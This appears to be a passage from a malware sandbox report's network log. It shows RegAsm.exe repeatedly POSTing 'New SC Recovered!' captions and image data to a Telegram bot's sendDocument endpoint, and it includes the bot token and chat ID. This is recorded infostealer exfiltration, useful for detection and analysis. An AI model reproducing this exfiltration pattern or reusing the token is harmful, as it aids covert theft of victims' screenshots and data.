                                                2024-05-24 05:44:54 UTC1179OUTData Raw: 56 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b 06 8a 99 45 49 59 91 38 29 ab 33 d3 34 dd 4e ee e5 b6 bd e6 d8 10 65 e4 3b 41 c7 a6 ee bf ad 65 78 ab c4 f0 49 6a f6 16 12 09 0c 83 12 48 bd 00 f4 1e b5 c4 51 5c 8f 06 a7 55 54 a8 ef 6d 91 b5 29 ba 54 dc 17 5e a1 45 14 57 71 01 5a fa 46 a8 b0 27 d9 e7 38 4f e1 6f 4f 6a 64 3e 1c d5 e7 85 26 8e d3 74 72 28 65 3e 62 0c 83 c8 ef 4f ff 00 84 5f 5a ff 00 9f 2f fc 8a 9f e3 4a 54 dc 95 9a 33 9f 24 95 9b 3a fd 33 54 bc 99 92 18 ae c7 97 fd fc 29 2a be cc 79 15 1f 88 bc 51 6d 69 68 f6 d6 53 09 ae 58 15 dc a7 21 3d f3 dc d7 29 ff 00 08 be b5 ff 00 3e 5f f9 15 3f c6 8f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 35 c7 3c 03 ab 35 2a 8d b4 ba 1a d0 aa a8 c5 c5 3d 5f 53 1e 8a d2 1a 0e a8 c0 11 6b c1 e7 ef af f8 d6 7c b1 bc 52 bc 52 0c 3a
                                                Data Ascii: V `2+EIY8)34Ne;AexIjHQ\UTm)T^EWqZF'8OoOjd>&tr(e>bO_Z/JT3$:3T)*yQmihSX!=)>_?E5<5*=_Sk|RR:
                                                2024-05-24 05:44:54 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 37 38 34 39 32 64 39 33 37 37 30 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcc78492d93770--
                                                2024-05-24 05:44:54 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:54 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.749722149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:45:00 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dccb6d9b422ea1
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:45:00 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:45:00 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 62 36 64 39 62 34 32 32 65 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 62 36 64 39 62 34 32 32 65 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 30 32 2f 32 30 32 34 20 31 36 3a 33 37 3a 35 37 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dccb6d9b422ea1Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dccb6d9b422ea1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/02/2024 16:37:57User
                                                2024-05-24 05:45:00 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:45:00 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:45:00 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:45:00 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:45:00 UTC1179OUTData Raw: 56 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b 06 8a 99 45 49 59 91 38 29 ab 33 d3 34 dd 4e ee e5 b6 bd e6 d8 10 65 e4 3b 41 c7 a6 ee bf ad 65 78 ab c4 f0 49 6a f6 16 12 09 0c 83 12 48 bd 00 f4 1e b5 c4 51 5c 8f 06 a7 55 54 a8 ef 6d 91 b5 29 ba 54 dc 17 5e a1 45 14 57 71 01 5a fa 46 a8 b0 27 d9 e7 38 4f e1 6f 4f 6a 64 3e 1c d5 e7 85 26 8e d3 74 72 28 65 3e 62 0c 83 c8 ef 4f ff 00 84 5f 5a ff 00 9f 2f fc 8a 9f e3 4a 54 dc 95 9a 33 9f 24 95 9b 3a fd 33 54 bc 99 92 18 ae c7 97 fd fc 29 2a be cc 79 15 1f 88 bc 51 6d 69 68 f6 d6 53 09 ae 58 15 dc a7 21 3d f3 dc d7 29 ff 00 08 be b5 ff 00 3e 5f f9 15 3f c6 8f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 35 c7 3c 03 ab 35 2a 8d b4 ba 1a d0 aa a8 c5 c5 3d 5f 53 1e 8a d2 1a 0e a8 c0 11 6b c1 e7 ef af f8 d6 7c b1 bc 52 bc 52 0c 3a
                                                Data Ascii: V `2+EIY8)34Ne;AexIjHQ\UTm)T^EWqZF'8OoOjd>&tr(e>bO_Z/JT3$:3T)*yQmihSX!=)>_?E5<5*=_Sk|RR:
                                                2024-05-24 05:45:00 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 62 36 64 39 62 34 32 32 65 61 31 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dccb6d9b422ea1--
                                                2024-05-24 05:45:01 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:45:01 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.749723149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:45:03 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcce4615a1f8c7
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:45:04 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:45:04 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 65 34 36 31 35 61 31 66 38 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 65 34 36 31 35 61 31 66 38 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 30 36 2f 32 30 32 34 20 30 37 3a 32 32 3a 33 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcce4615a1f8c7Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcce4615a1f8c7Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/06/2024 07:22:35User
                                                2024-05-24 05:45:04 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:45:04 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:45:04 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:45:04 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:45:04 UTC1179OUTData Raw: 56 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b 06 8a 99 45 49 59 91 38 29 ab 33 d3 34 dd 4e ee e5 b6 bd e6 d8 10 65 e4 3b 41 c7 a6 ee bf ad 65 78 ab c4 f0 49 6a f6 16 12 09 0c 83 12 48 bd 00 f4 1e b5 c4 51 5c 8f 06 a7 55 54 a8 ef 6d 91 b5 29 ba 54 dc 17 5e a1 45 14 57 71 01 5a fa 46 a8 b0 27 d9 e7 38 4f e1 6f 4f 6a 64 3e 1c d5 e7 85 26 8e d3 74 72 28 65 3e 62 0c 83 c8 ef 4f ff 00 84 5f 5a ff 00 9f 2f fc 8a 9f e3 4a 54 dc 95 9a 33 9f 24 95 9b 3a fd 33 54 bc 99 92 18 ae c7 97 fd fc 29 2a be cc 79 15 1f 88 bc 51 6d 69 68 f6 d6 53 09 ae 58 15 dc a7 21 3d f3 dc d7 29 ff 00 08 be b5 ff 00 3e 5f f9 15 3f c6 8f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 35 c7 3c 03 ab 35 2a 8d b4 ba 1a d0 aa a8 c5 c5 3d 5f 53 1e 8a d2 1a 0e a8 c0 11 6b c1 e7 ef af f8 d6 7c b1 bc 52 bc 52 0c 3a
                                                Data Ascii: V `2+EIY8)34Ne;AexIjHQ\UTm)T^EWqZF'8OoOjd>&tr(e>bO_Z/JT3$:3T)*yQmihSX!=)>_?E5<5*=_Sk|RR:
                                                2024-05-24 05:45:04 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 65 34 36 31 35 61 31 66 38 63 37 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcce4615a1f8c7--
                                                2024-05-24 05:45:04 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:45:04 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.749724149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:45:05 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcd0bba16aab02
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:45:06 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:45:06 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 30 62 62 61 31 36 61 61 62 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 30 62 62 61 31 36 61 61 62 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 30 39 2f 32 30 32 34 20 31 30 3a 32 39 3a 30 32 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcd0bba16aab02Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcd0bba16aab02Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/09/2024 10:29:02User
                                                2024-05-24 05:45:06 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:45:06 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:45:06 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
